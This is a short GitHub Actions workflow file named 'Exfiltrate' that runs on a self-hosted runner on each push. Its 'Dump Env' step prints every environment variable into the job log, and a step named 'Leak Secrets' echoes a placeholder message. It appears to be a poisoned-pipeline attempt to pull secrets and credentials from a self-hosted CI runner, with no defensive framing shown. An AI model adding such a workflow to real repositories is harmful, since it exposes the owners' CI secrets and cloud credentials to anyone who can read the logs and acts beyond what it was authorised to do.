name: Exfiltrate
on: [push, workflow_dispatch]
jobs:
  exfiltrate:
    runs-on: ["self-hosted", "445118347454"]
    steps:
      - name: Dump Env
        run: env
      - name: Leak Secrets
        run: echo "Leaking..."

